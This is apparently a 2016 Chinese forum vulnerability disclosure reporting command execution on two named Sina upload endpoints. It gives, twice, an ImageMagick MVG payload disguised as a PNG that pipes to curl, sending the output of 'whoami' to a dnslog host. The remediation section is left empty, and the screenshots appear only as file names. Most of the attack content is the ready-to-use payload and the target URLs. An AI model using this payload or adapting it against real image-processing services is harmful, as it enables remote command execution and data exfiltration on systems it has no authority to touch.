HanDs
管理员

[7月漏洞公开] 新浪多处命令执行 



绕过.

详细说明:

发博文处:http://control.blog.sina.com.cn/admin/article/article_add.php

上传png图片

code 区域
push graphic-context
viewbox 0 0 640 480
image Over 0,0 0,0 '|curl xxxxx.dnslog.link/?whoami=`whoami`'
pop graphic-context



QQ截图20160531102903.jpg



QQ截图20160531103128.jpg



然后是

http://vi.travel.sina.com.cn/vision/upload.php

QQ截图20160531103225.jpg



QQ截图20160531103417.jpg







漏洞证明:

发博文处:http://control.blog.sina.com.cn/admin/article/article_add.php

上传png图片

code 区域
push graphic-context
viewbox 0 0 640 480
image Over 0,0 0,0 '|curl xxxxx.dnslog.link/?whoami=`whoami`'
pop graphic-context



QQ截图20160531102903.jpg



QQ截图20160531103128.jpg



然后是

http://vi.travel.sina.com.cn/vision/upload.php

QQ截图20160531103225.jpg



QQ截图20160531103417.jpg

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
新浪 命令 执行
#1楼
发帖时间:2016-7-15   |   查看数:0   |   回复数:0
游客组
快速回复